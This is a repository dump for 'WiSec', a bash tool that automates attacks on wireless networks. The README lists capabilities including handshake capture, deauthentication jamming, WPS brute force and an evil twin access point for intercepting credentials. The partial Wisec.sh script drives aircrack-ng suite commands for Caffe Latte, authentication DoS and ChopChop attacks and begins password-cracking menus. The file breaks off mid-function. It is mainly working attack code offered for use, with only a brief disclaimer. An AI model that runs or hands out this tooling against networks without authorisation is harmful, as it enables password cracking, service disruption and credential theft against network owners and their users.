├── LICENSE ├── README.md ├── WiSec.png └── Wisec.sh /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 j4ckrisz 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WiFi Pentesting Automation Tool 2 | 3 | ## Overview 4 | WiSec is an advanced WiFi penetration testing automation tool designed to simplify and enhance security assessments of wireless networks. 5 | 6 | ![WiSec Interface](WiSec.png) 7 | 8 | ## Features 9 | - **Handshake Capture**: Captures WPA/WPA2 handshakes for password cracking. 10 | - **Passive Handshake Capture**: Listens for handshake packets without active deauthentication. 11 | - **PMKID Attack**: Extracts PMKID from routers vulnerable to this attack. 12 | - **Offline Cracking**: Uses wordlists and cracking techniques to recover passwords. 13 | - **Constant Deauth Attack**: Jamming attack that disconnects clients. 14 | - **Beacon Flood Attack**: Generates fake APs to flood WiFi networks. 15 | - **WPS Brute-force & Null Pin Attack**: Attempts to brute-force WPS-enabled networks. 16 | - **Pixie Dust Attack**: Exploits WPS vulnerabilities to retrieve the key. 17 | - **Caffe Latte Attack**: Targets WEP-based networks. 18 | - **Authentication DoS**: Overwhelms networks with authentication requests. 19 | - **ChopChop Attack**: Decrypts WEP packets by analyzing packet fragments. 20 | - **MAC Changer**: Spoofs MAC address for anonymity. 21 | - **Evil Twin Attack**: Creates a fake AP to intercept credentials. 22 | 23 | ## Requirements 24 | - Linux-based OS (Kali Linux recommended) 25 | - Aircrack-ng suite 26 | - Wireless network adapter with monitor mode support 27 | 28 | ## Installation 29 | ```sh 30 | # Clone the repository 31 | git clone https://github.com/j4ckrisz/wisec.git 32 | cd wisec 33 | ``` 34 | 35 | ## Usage 36 | ### Launch WiSec 37 | ```sh 38 | sudo ./WiSec.sh -n 39 | ``` 40 | 41 | ## Legal Disclaimer 42 | This tool is intended for educational and authorized security testing purposes only. Unauthorized use is illegal. 43 | 44 | ## Contribution 45 | Feel free to submit issues and pull requests to improve the tool. 46 | 47 | ## License 48 | MIT License 49 | -------------------------------------------------------------------------------- /WiSec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j4ckrisz/WiSec/0797e171401bc4a24aa7e91aaba8380dbdf310e6/WiSec.png -------------------------------------------------------------------------------- /Wisec.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Colours 4 | greenColour="\e[0;32m\033[1m" 5 | endColour="\033[0m\e[0m" 6 | redColour="\e[0;31m\033[1m" 7 | blueColour="\e[0;34m\033[1m" 8 | yellowColour="\e[0;33m\033[1m" 9 | purpleColour="\e[0;35m\033[1m" 10 | turquoiseColour="\e[0;36m\033[1m" 11 | grayColour="\e[0;37m\033[1m" 12 | 13 | trap ctrl_c INT 14 | 15 | I_monitor=0 16 | 17 | ################################################## Ctrl +C Options ################################################## 18 | 19 | function ctrl_c(){ 20 | echo -ne "\n${redColour}[!]${endColour} ${grayColour}Exiting....\n${endColour}" 21 | tput cnorm 22 | echo -ne "${greenColour}\n Bye bye ...\n${endColour}" 23 | 24 | airmon-ng stop iw_wisecmon > /dev/null 2&>1 25 | 26 | ifconfig iw_wisec down 27 | ip link set iw_wisec name $networkCard 28 | ifconfig $networkCard up 29 | 30 | clear 31 | rm -r 1 iface.txt dnsmasq.conf hostapd.conf > /dev/null 2>&1 32 | 33 | #clear iptables 34 | iptables -P INPUT ACCEPT 35 | iptables -P FORWARD ACCEPT 36 | iptables -P OUTPUT ACCEPT 37 | iptables -t nat -F 38 | iptables -t mangle -F 39 | iptables -F 40 | iptables -X 41 | 42 | echo 0 > /proc/sys/net/ipv4/ip_forward 43 | sleep 1.5;exit 0 44 | 45 | } 46 | 47 | ################################################## Banners ################################################## 48 | 49 | function wisec_banner(){ 50 | clear 51 | echo -ne "${greenColour}██╗ ██╗██╗███████╗███████╗ ██████╗${endColour}\n" 52 | echo -ne "${greenColour}██║ ██║██║██╔════╝██╔════╝██╔════╝${endColour}\n" 53 | echo -ne "${greenColour}██║ █╗ ██║██║███████╗█████╗ ██║ ${endColour}\n" 54 | echo -ne "${greenColour}██║███╗██║██║╚════██║██╔══╝ ██║ ${endColour}\n" 55 | echo -ne "${greenColour}╚███╔███╔╝██║███████║███████╗╚██████╗${endColour}${grayColour} - by J4ckris${endColour}\n" 56 | echo -ne "${greenColour} ╚══╝╚══╝ ╚═╝╚══════╝╚══════╝ ╚═════╝${endColour}\n" 57 | 58 | } 59 | 60 | function all_banners_menu(){ 61 | random_number=$(($RANDOM % 5 + 1)) 62 | 63 | if [ "$random_number" == "1" ];then 64 | 65 | arts_1 66 | 67 | elif [ "$random_number" == "2" ];then 68 | 69 | arts_2 70 | 71 | elif [ "$random_number" == "3" ];then 72 | 73 | arts_3 74 | 75 | elif [ "$random_number" == "4" ];then 76 | 77 | arts_4 78 | 79 | elif [ "$random_number" == "5" ];then 80 | 81 | arts_5 82 | 83 | fi 84 | 85 | } 86 | 87 | function arts_1(){ 88 | 89 | 90 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡤⠐⠢⠀⠀⠀⠀⠀⠀${endColour}" 91 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⠉⠀⠀⠀⠱⠀⠀⠀⠀⠀${endColour}" 92 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣮⣑⠡⡀⡀⠀⢀⡇⠀⠀⠀⠀${endColour}" 93 | sleep 0.5 94 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣄⠈⣌⠪⡄⢰⢡⠀⠀⠀⠀${endColour}" 95 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣾⣀⠈⢂⠃⡈⠘⣄⠀⠀⠀${endColour}" 96 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢘⣿⣷⣄⠤⢢⠁⡠⠂⠢⡀⠀${endColour}" 97 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⠏⣸⡿⠟⣾⠓⠉⡖⠀⠀⠈⢂${endColour}" 98 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣆⡏⢸⠟⠀⣾⠀⠈⢡⡠⠂⠀⠈${endColour}" 99 | echo -e "${blueColour}⠱⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡼⡀⡇⢈⠐⠠⡟⠀⠀⢞⡿⢅⠄⢀${endColour}" 100 | echo -e "${blueColour}⠀⠹⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠜⠊⢛⡃⠘⠀⠀⡇⠀⡈⠶⠄⠒⠂⡔${endColour}" 101 | sleep 0.5 102 | echo -e "${blueColour}⠀⠀⠘⣿⣿⣿⣷⣄⣀⠀⠤⡠⡤⠒⠫⠱⠀⣼⠧⠀⠀⠀⢁⠠⢱⠤⠒⠒⣠⠇${endColour}" 103 | echo -e "${blueColour}⠀⠀⠀⠘⢿⣿⣿⣿⣾⡷⡋⣞⠔⡣⠎⠙⠂⠘⠒⠲⡖⡒⠒⡶⢙⠀⠈⠉⣸⠀${endColour}" 104 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠉⠻⣿⣿⡿⣿⣿⣯⠪⡖⠤⠤⠔⣀⣤⡃⠀⠀⡁⠀⣀⠄⠊⡜⠀${endColour}" 105 | sleep 0.5 106 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠈⠛⢿⡌⠙⢿⣾⡫⠅⠂⠉⠀⠀⠁⠪⢁⠈⠉⠀⠀⣸⠀⠀${endColour}" 107 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠚⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠉⠀⠀${endColour}" 108 | 109 | } 110 | 111 | 112 | function arts_2(){ 113 | 114 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢛⣯⣝⣿⣿⣿⣿⣿⣿${endColour}" 115 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢟⣶⣿⣿⣿⣎⣿⣿⣿⣿⣿${endColour}" 116 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠑⠮⣞⢿⢿⣿⡿⢸⣿⣿⣿⣿${endColour}" 117 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠻⣷⠳⣕⢻⡏⡞⣿⣿⣿⣿${endColour}" 118 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠁⠿⣷⡽⣼⢷⣧⠻⣿⣿⣿${endColour}" 119 | sleep 0.5 120 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡧⠀⠈⠻⣛⡝⣾⢟⣽⣝⢿⣿${endColour}" 121 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⣰⠇⢀⣠⠁⣬⣶⢩⣿⣿⣷⡽${endColour}" 122 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠹⢰⡇⣠⣿⠁⣿⣷⡞⢟⣽⣿⣷${endColour}" 123 | echo -e "${blueColour}⣎⠙⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢃⢿⢸⡷⣯⣟⢠⣿⣿⡡⢀⡺⣻⡿${endColour}" 124 | sleep 0.5 125 | echo -e "${blueColour}⣿⣆⠀⠈⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⡿⣣⣵⡤⢼⣧⣿⣿⢸⣿⢷⣉⣻⣭⣽⢫${endColour}" 126 | echo -e "${blueColour}⣿⣿⣧⠀⠀⠀⠈⠻⠿⣿⣛⢟⢛⣭⣔⣎⣿⠃⣘⣿⣿⣿⡾⣟⡎⣛⣭⣭⠟⣸${endColour}" 127 | echo -e "${blueColour}⣿⣿⣿⣧⡀⠀⠀⠀⠁⢈⢴⠡⣫⢜⣱⣦⣽⣧⣭⣍⢩⢭⣭⢉⡦⣿⣷⣶⠇⣿${endColour}" 128 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣶⣄⠀⠀⢀⠀⠀⠐⣕⢩⣛⣛⣫⠿⠛⢼⣿⣿⢾⣿⠿⣻⣵⢣⣿${endColour}" 129 | sleep 0.5 130 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣷⣤⡀⢳⣦⡀⠁⢔⣺⣽⣶⣿⣿⣾⣕⡾⣷⣶⣿⣿⠇⣿⣿${endColour}" 131 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣥⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣶⣿⣿${endColour}" 132 | 133 | } 134 | 135 | 136 | function arts_3(){ 137 | 138 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⣀⡤⠔⠒⠊⠉⠉⠉⠉⠙⠒⠲⠤⣀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 139 | echo -e "${blueColour}⠀⠀⠀⠀⠀⣠⠔⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠲⣄⠀⠀⠀⠀⠀${endColour}" 140 | echo -e "${blueColour}⠀⠀⠀⣠⠞⠁⠀⣀⠀⠀⠀⠀⢀⣀⡀⠀⢀⣀⠀⠀⠀⠀⢀⠀⠈⠱⣄⠀⠀⠀${endColour}" 141 | echo -e "${blueColour}⠀⠀⡴⠁⡠⣴⠟⠁⢀⠤⠂⡠⠊⡰⠁⠇⢃⠁⠊⠑⠠⡀⠀⢹⣶⢤⡈⢣⡀⠀${endColour}" 142 | sleep 0.5 143 | echo -e "${blueColour}⠀⡼⢡⣾⢓⡵⠃⡐⠁⠀⡜⠀⠐⠃⣖⣲⡄⠀⠀⠱⠀⠈⠢⠈⢮⣃⣷⢄⢳⠀${endColour}" 144 | echo -e "${blueColour}⢰⠃⣿⡹⣫⠃⡌⠀⠄⠈⠀⠀⠀⠀⠀⠋⠀⠀⠀⠀⠣⠀⠀⠱⠈⣯⡻⣼⠈⡇${endColour}" 145 | echo -e "${blueColour}⡞⢈⢿⡾⡃⠰⠀⠀⠀⠀⠀⠀⠀⠀⣘⣋⠀⠀⠀⠀⠀⠀⠀⠀⠇⢸⢿⣿⢠⢸${endColour}" 146 | sleep 0.5 147 | echo -e "${blueColour}⡇⢸⡜⣴⠃⠀⠀⠀⠀⠀⣀⣀⣤⡎⠹⡏⢹⣦⣀⣀⠀⠀⠀⠀⢈⠘⣧⢣⡟⢸${endColour}" 148 | echo -e "${blueColour}⢧⢊⢳⡏⣤⠸⠀⠀⠀⢸⣿⣿⣿⡇⢰⡇⢠⣿⣿⣿⣷⠀⠀⠀⡆⢸⢹⡼⣱⢸${endColour}" 149 | echo -e "${blueColour}⢸⡘⢷⣅⣿⢂⢃⠐⠂⣿⣿⣿⣿⣿⣼⣇⣾⣿⣿⣿⣿⠁⠂⡰⡠⣿⢨⡾⠃⡇${endColour}" 150 | sleep 0.5 151 | echo -e "${blueColour}⠀⢳⡱⣝⠻⡼⣆⡁⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠐⣰⣇⠿⣋⠝⡼⠀${endColour}" 152 | echo -e "${blueColour}⠀⠀⢳⡈⢻⠶⣿⣞⢾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⢣⣿⡶⠟⢉⡼⠁⠀${endColour}" 153 | echo -e "${blueColour}⠀⠀⠀⠙⢦⡑⠲⠶⠾⠿⢟⣿⣿⣿⣿⣿⣿⣿⣿⡛⠿⠷⠶⠶⠊⡡⠋⠀⠀⠀${endColour}" 154 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠙⠦⣝⠛⠛⠛⣿⣿⣿⣿⣿⣿⣿⣿⡛⠛⠛⣋⠴⠋⠀⠀⠀⠀⠀${endColour}" 155 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠉⠒⠦⠿⣿⣿⣿⣿⣿⣿⠿⠧⠒⠋⠁⠀⠀⠀⠀⠀⠀⠀${endColour}" 156 | 157 | } 158 | function arts_4(){ 159 | 160 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⠿⢛⣫⣭⣵⣶⣶⣶⣶⣦⣭⣍⣛⠿⣿⣿⣿⣿⣿⣿⣿⣿${endColour}" 161 | echo -e "${blueColour}⣿⣿⣿⣿⣿⠟⣫⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣍⠻⣿⣿⣿⣿⣿${endColour}" 162 | echo -e "${blueColour}⣿⣿⣿⠟⣡⣾⣿⠿⣿⣿⣿⣿⡿⠿⢿⣿⡿⠿⣿⣿⣿⣿⡿⣿⣷⣎⠻⣿⣿⣿${endColour}" 163 | echo -e "${blueColour}⣿⣿⢋⣾⢟⠋⣠⣾⡿⣛⣽⢟⣵⢏⣾⣸⡼⣾⣵⣮⣟⢿⣿⡆⠉⡛⢷⡜⢿⣿${endColour}" 164 | echo -e "${blueColour}⣿⢃⡞⠁⡬⢊⣼⢯⣾⣿⢣⣿⣯⣼⠩⠍⢻⣿⣿⣎⣿⣷⣝⣷⡑⠼⠈⡻⡌⣿${endColour}" 165 | echo -e "${blueColour}⡏⣼⠀⢆⠔⣼⢳⣿⣻⣷⣿⣿⣿⣿⣿⣴⣿⣿⣿⣿⣜⣿⣿⣎⣷⠐⢄⠃⣷⢸${endColour}" 166 | sleep 0.5 167 | echo -e "${blueColour}⢡⡷⡀⢁⢼⣏⣿⣿⣿⣿⣿⣿⣿⣿⠧⠴⣿⣿⣿⣿⣿⣿⣿⣿⣸⡇⡀⠀⡟⡇${endColour}" 168 | echo -e "${blueColour}⢸⡇⢣⠋⣼⣿⣿⣿⣿⣿⠿⠿⠛⢱⣆⢰⡆⠙⠿⠿⣿⣿⣿⣿⡷⣧⠘⡜⢠⡇${endColour}" 169 | echo -e "${blueColour}⡘⡵⡌⢰⠛⣇⣿⣿⣿⡇⠀⠀⠀⢸⡏⢸⡟⠀⠀⠀⠈⣿⣿⣿⢹⡇⡆⢃⠎⡇${endColour}" 170 | echo -e "${blueColour}⡇⢧⡈⠺⠀⡽⡼⣯⣽⠀⠀⠀⠀⠀⠃⠸⠁⠀⠀⠀⠀⣾⣽⢏⢟⠀⡗⢁⣼⢸${endColour}" 171 | echo -e "${blueColour}⣿⡌⢎⠢⣄⢃⠹⢾⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣯⠏⠸⣀⠴⣢⢃⣿${endColour}" 172 | sleep 0.5 173 | echo -e "${blueColour}⣿⣿⡌⢷⡄⣉⠀⠡⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⡜⠀⢉⣠⡶⢃⣾⣿${endColour}" 174 | echo -e "${blueColour}⣿⣿⣿⣦⡙⢮⣍⣉⣁⣀⡠⠀⠀⠀⠀⠀⠀⠀⠀⢤⣀⣈⣉⣉⣵⢞⣴⣿⣿⣿${endColour}" 175 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣦⣙⠢⣤⣤⣤⠀⠀⠀⠀⠀⠀⠀⠀⢤⣤⣤⠴⣋⣴⣿⣿⣿⣿⣿${endColour}" 176 | echo -e "${blueColour}⣿⣿⣿⣿⣿⣿⣿⣿⣶⣭⣙⣀⠀⠀⠀⠀⠀⠀⣀⣘⣭⣴⣾⣿⣿⣿⣿⣿⣿⣿${endColour}" 177 | 178 | 179 | } 180 | 181 | function arts_5(){ 182 | 183 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡠⠤⠤⠤⠤⠤⢄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 184 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⠊⠁⠀⢀⣀⣀⠀⠠⠤⢀⡑⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 185 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠅⠒⠈⠉⠀⠀⠀⠀⢀⡀⠀⠘⡀⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 186 | sleep 0.5 187 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⣇⢠⣤⣄⡀⠀⢀⣴⡾⠛⠛⠓⠀⢱⠸⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 188 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠋⠉⣩⠻⠖⡘⠛⣴⣶⣦⣤⠴⢄⣧⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 189 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠂⠾⠿⠿⠀⣾⡀⠉⠉⠁⠀⠀⠀⣿⠺⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 190 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⡆⠀⠀⠀⠀⢿⠇⢠⠠⠤⢠⡤⠂⢸⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 191 | sleep 0.5 192 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⡠⣖⣁⣻⣶⣾⣥⣤⣴⣿⡏⠀⡼⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 193 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢳⡻⡛⣉⣻⣿⡭⠄⢀⠞⠀⣴⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 194 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠑⣌⠀⠈⣿⡇⠀⠈⡠⠪⠏⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 195 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡔⠙⢷⡤⠻⠇⠤⠊⠀⠀⠀⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 196 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⣀⡠⡔⠁⢠⠀⠀⠙⠢⣀⠀⠀⠀⠀⣠⠇⢳⢄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀${endColour}" 197 | sleep 0.5 198 | echo -e "${blueColour}⠀⢀⡀⠤⠀⠒⠊⠉⠀⠀⡇⠀⠘⡄⠀⠀⠀⠈⠑⢢⡤⢼⡁⠀⢸⠀⠉⢶⠠⢀⡀⠀⠀⠀⠀⠀${endColour}" 199 | echo -e "${blueColour}⡎⠁⠀⠀⠀⠀⠀⠀⠀⠀⡿⠀⠀⢻⢦⠀⠀⠀⡴⠋⠀⠀⠙⡄⢸⡆⠀⠈⡄⠀⠈⠉⠐⠢⡄⠀${endColour}" 200 | echo -e "${blueColour}⠁⠀⠀⠀⠀⠀⠀⠀⠀⠠⠃⠀⠀⠈⡄⠑⣄⡞⢆⠀⠀⢀⠜⠙⠊⢱⠀⠀⠘⡄⠀⠀⠀⠀⠘⡄${endColour}" 201 | echo -e "${blueColour}⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠳⠄⠀⠀⣧⠀⠈⠀⢰⠋⠁⠘⣄⠀⠀⠸⡄⠀⠠⠃⠀⠀⠀⠀⠀⢳${endColour}" 202 | echo -e "${blueColour}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠒⠐⠀⠂⠒⠐⠒⠀⠀⠂⠒⠒⠒⠒⠐⠂⠒⠀⠒⠂⠀⠀⠀${endColour}" 203 | 204 | 205 | } 206 | ################################################## Caffe Latte ################################################## 207 | function CaffeLatte(){ 208 | clear 209 | all_banners_menu 210 | 211 | xterm -hold -e "airodump-ng iw_wisecmon" & 212 | xterm_airodump_PID=$! 213 | 214 | echo -ne "\n${blueColour}[*] Set the name of the AP: ${endColour}" && read AP_name 215 | echo -ne "\n${blueColour}[*] Set the BSSID of the AP: ${endColour}" && read AP_BSSID 216 | echo -ne "\n${blueColour}[*] Set the Channel of the AP: ${endColour}" && read Channel 217 | 218 | kill -9 $xterm_airodump_PID 219 | wait $airodump_xterm_PID 2>/dev/null 220 | 221 | xterm -hold -e "airodump-ng -c $Channel -w $AP_name --essid $AP_name iw_wisecmon" & 222 | 223 | airodump_filter_xterm_PID=$! 224 | 225 | xterm -hold -e "airbase-ng -c $Channel -a $AP_BSSID -e '$AP_name' -L -W 1 -x 100 iw_wisecmon" & 226 | 227 | xterm_airbase_PID=$! 228 | 229 | echo -ne "${blueColour}[*]${endColour} ${grayColour}The attack has been started, just wait 5 minutes${endColour}" 230 | 231 | sleep 300; kill -9 $airodump_filter_xterm_PID;wait $airodump_filter_xterm_PID 2>/dev/null 232 | kill -9 $xterm_airbase_PID; wait $xterm_airbase_PID 2>/dev/null 233 | 234 | 235 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Starting aircrack-ng ${endColour}\n" 236 | mkdir Captures 2>/dev/null 237 | 238 | mv $AP_name*.cap Captures/$AP_name-wep-caffelatte.cap 2>/dev/null 239 | 240 | xterm -hold -e "aircrack-ng -e '$AP_name' Captures/$AP_name-wep-caffelatte.cap " & disown 241 | 242 | echo -ne "\n${blueColour}[*]${endColour}{grayColour} Aircrack-ng has been started${endColour}\n" 243 | sleep 10 244 | 245 | menu 246 | } 247 | ################################################## Auth DoS ################################################## 248 | 249 | 250 | function authentication_attack(){ 251 | 252 | clear 253 | xterm -hold -e "airodump-ng iw_wisecmon" & 254 | airodump_xterm_PID=$! 255 | 256 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Name: ${endColour}" && read APessid 257 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Channel: ${endColour}" && read Channel 258 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point BSSID: ${endColour}" && read AP_BSSID 259 | 260 | 261 | kill -9 $airodump_xterm_PID 262 | wait $airodump_xterm_PID 2>/dev/null 263 | 264 | sleep 10; xterm -hold -e "aireplay-ng -1 0 -e ${APessid} -e '$APessid' -a '$AP_BSSID' -h '$Current_mac' iw_wisecmon" & 265 | 266 | clear 267 | menu 268 | 269 | } 270 | 271 | ################################################## ChopChop attack ################################################## 272 | 273 | function ChopChop_attack(){ 274 | 275 | xterm -hold -e "airodump-ng iw_wisecmon" & 276 | airodump_xterm_PID=$! 277 | 278 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Name: ${endColour}" && read APSSID 279 | 280 | kill -9 $airodump_xterm_PID 281 | wait $airodump_xterm_PID 2>/dev/null 282 | 283 | mkdir Captures 2>/dev/null 284 | 285 | pushd Captures > /dev/null 2>&1 286 | 287 | xterm -hold -e "aireplay-ng -4 -e '$APSSID' -h '$Current_mac' iw_wisecmon" & 288 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} ChopChop attack has been started, files will be in the Captures directory${endColour}" 289 | sleep 10 290 | 291 | clear 292 | menu 293 | 294 | } 295 | 296 | ################################################## Password Cracking Funcs ################################################## 297 | function cracking_pass(){ 298 | 299 | ## Option yes/no 300 | while true; do 301 | 302 | echo -ne "${blueColour}[*]${endColour}${grayColour} Do you want to start the cracking process [ y/n ]: ${endColour}" 303 | 304 | read yn 305 | case $yn in 306 | 307 | [yY] ) echo -ne "\n"; 308 | 309 | break;; 310 | 311 | [nN] ) echo -ne "\n"; 312 | 313 | menu;; 314 | 315 | *) echo -ne "\n";; 316 | 317 | esac 318 | done 319 | 320 | ## Cracking Using Crunch 321 | 322 | while true;do 323 | 324 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Do you want yo start a brute-force attack using crunch [ y/n ]:${endColour} " 325 | 326 | read yn 327 | 328 | case $yn in 329 | 330 | [yY] ) echo -ne "\n"; 331 | 332 | crunch_options;break;; 333 | 334 | [nN] ) echo -ne "\n"; 335 | 336 | break;; 337 | 338 | *) echo -ne "\n";; 339 | 340 | esac 341 | done 342 | 343 | ## Dictionary 344 | while true; do 345 | 346 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Do you want yo start a dictionary attack [ y/n ]:${endColour} \n" 347 | read yn 348 | case $yn in 349 | 350 | [yY] ) dictionary_attack_pass;; 351 | 352 | 353 | [nN] ) echo -ne "\n"; 354 | 355 | menu;; 356 | 357 | * ) echo -ne "";; 358 | 359 | esac 360 | done 361 | clear 362 | 363 | } 364 | 365 | 366 | function password_cracking_options(){ 367 | 368 | opc=0 369 | 370 | while [[ $inpu1 -ne 3 ]]; do 371 | clear 372 | all_banners_menu 373 | echo -ne "\n${blueColour}[*]${endColour} ${grayColour}Choose a way to crack your hash:${endColour}\n" 374 | echo -ne "\n${blueColour}[1]${endColour} ${grayColour}Wordlist${endColour}\n" 375 | echo -ne "${blueColour}[2]${endColour} ${grayColour}Brute-Force${endColour}\n" 376 | echo -ne "${blueColour}[3]${endColour} ${grayColour}Back${endColour} \n" 377 | echo -ne "\n${yellowColour}[>]${endColour}${grayColour}Choose an option > ${endColour}" && read opc 378 | 379 | 380 | case $opc in 381 | 382 | 1) clear;dictionary_attack_pass;; 383 | 384 | 2) clear;crunch_options;; 385 | 386 | 3) clear;menu;; 387 | 388 | *) 